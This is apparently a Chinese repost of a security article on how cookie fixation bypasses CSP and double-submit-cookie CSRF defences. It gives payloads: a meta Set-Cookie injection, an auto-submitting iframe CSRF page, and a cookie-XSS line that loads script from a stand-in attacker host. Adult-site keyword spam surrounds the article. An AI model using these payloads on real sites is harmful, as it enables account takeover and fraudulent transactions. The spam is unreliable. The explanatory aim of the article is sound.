成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

CSP flaws: cookie fixation

安全 漏洞 應用安全
今天我們來考察一些與Cookie篡改漏洞有關的例子。

[[182419]]

前言

我們知道,CSP不會阻止 這樣的標簽。因此,對于含有XSS漏洞的頁面來說,即使提供了CSP保護,攻擊者仍然可以通過寫入Cookie來發動攻擊。 下面,我們來考察一些與Cookie篡改漏洞有關的例子。

雙重提交Cookie示例

雙重提交cookie是一些應用程序和框架用于處理CSRF的技術。這意味著所有表單都必須包含一個在cookie中設置的令牌。 如果在表單中發送的令牌與cookie中的令牌不同,則請求被丟棄。 這種技術被OWASP推薦為基于會話的令牌的替代方案。

在偽代碼中它可能看起來像這樣:

  1. //User sent the form 
  2. if(isset($_POST['submit'])){ 
  3.          if($_POST['token'] == $_COOKIE['token']){ 
  4.                   //Accept the form 
  5.          }else{ 
  6.                   echo "CSRF ATTACK DETECTED"; 
  7.                   exit(); 
  8.          } 

沒有CSP的時候,如果應用程序含有XSS漏洞,那么攻擊者就可以使用腳本來填寫并提交他們想要攻擊的任何表單:

  1. <script> 
  2. document.getElementById('sendmoneyto').value = 'Mathias'
  3. document.getElementById('form').submit(); 
  4. </script> 

使用CSP后,我們就可以(通過使用隨機數或限制內聯腳本)避免這種情況了。然而,攻擊者可以使用以下payload來實現同樣的事情:

  1. <meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore"> 

然后,在攻擊者的網站上:

  1. <script> 
  2. function submitForm(){ 
  3.   document.forms[0].submit(); 
  4. </script> 
  5. <iframe src='http://targetapplication/vulnerabletoxss?parameter=<meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore">' onload="submitForm()"></iframe> 
  6. <form action="http://targetapplication/targetform" method="POST"> 
  7. <input type="hidden" name="token" value="NotSoSecretAnyMore" /> 
  8. <input type="hidden" name="sendmoneyto" value="Mathias" /> 
  9. </form> 

 

 

 

 

因為攻擊者能夠改寫令牌,所以他們可以在其頁面上的表單中使用新令牌,從而繞過CSRF保護措施。

雙會話示例

現實中,使用多個會話Cookie的應用程序是非常少見的。例如,主應用程序使用一個會話Cookie,而“次應用程序”使用另一個會話Cookie。

如果攻擊者可以篡改cookie,他們就可以讓受害者在主應用程序中使用攻擊者的會話cookie。這樣的話,就可以讓受害者在主應用程序中以攻擊者身份登錄,而在次應用程序中以受害者身份登錄。

如果應用程序從主應用程序提取送貨數據,那么受害人在次應用程序中購買的產品就會被發往攻擊者的地址。

子域cookie XSS示例

如果子域中存在cookie XSS漏洞,攻擊者可以使用cookie篡改漏洞來設置XSS cookie,然后重定向到易受攻擊的頁面:

  1. <meta http-equiv="Set-Cookie" content="vulnerableCookie=<script src=//attackers/page.js>"> 
  2. <meta http-equiv="refresh" content="0;URL=http://othersubdomain.vulnerable/page_vulnerable_to_cookie_xss"> 

 

結論

雖然許多客戶端漏洞都可以通過CSP進行緩解,但是Cookie篡改仍然會導致一些安全問題,因為它對于這種漏洞根本不起作用。當開發使用CSP和cookie的應用程序時,一定要注意各種類型攻擊的不同之處。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2013-08-21 09:21:01

2013-08-21 10:08:16

2016-09-13 21:30:11

JavascriptCSPWeb

2020-04-29 15:30:22

CSP網頁前端

2014-04-21 10:24:06

2012-11-14 17:18:58

2013-05-15 15:05:53

2012-11-19 10:02:01

cookie poiscookie防篡改cookie

2009-07-24 17:04:57

ASP.NET中Coo

2024-07-30 14:31:01

2021-01-28 18:06:49

JavaScriptCookieWeb

2021-02-09 00:45:51

GoogleCookie隱私

2013-11-08 11:15:54

2010-09-07 14:27:04

Cookie

2015-03-25 09:36:27

CSP五鉆認證華為

2024-12-18 14:06:56

2021-11-15 05:31:37

云廠商CSP網絡

2025-06-03 02:00:00

2016-10-10 13:51:42

2011-07-04 10:39:57

Web
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日日夜夜天天 | 成人伊人 | 久久中文视频 | 欧美国产日韩精品 | 羞羞视频网站免费观看 | 欧美久久久久久久 | 久久久观看 | 国产精品电影网 | 日韩中文字幕视频在线观看 | 精品视频成人 | 三级免费毛片 | 久操伊人 | 伊人久久精品一区二区三区 | 欧美精品a∨在线观看不卡 国产精品久久国产精品 | 色一情一乱一伦一区二区三区 | 日本不卡一区二区三区 | 日韩精品一区二区三区视频播放 | 午夜寂寞影院列表 | 欧美精品综合在线 | 欧美日本一区二区 | 成人免费视屏 | 亚洲精品一区二三区不卡 | 在线久草 | 国产粉嫩尤物极品99综合精品 | 成人免费视频网站在线观看 | 国产一区亚洲 | 黄色a级一级片 | 美女一区二区在线观看 | 99久久精品国产一区二区三区 | 日韩精品一区二区三区中文在线 | 天天射天天干 | 国产精品久久久久久久久久久久久 | 黄色免费在线网址 | 古装三级在线播放 | www.久久.com | 国产精品亚洲成在人线 | 日韩在线视频免费观看 | 99精品电影| 欧美日韩一区二区三区视频 | 亚洲一av | 久久夜视频 |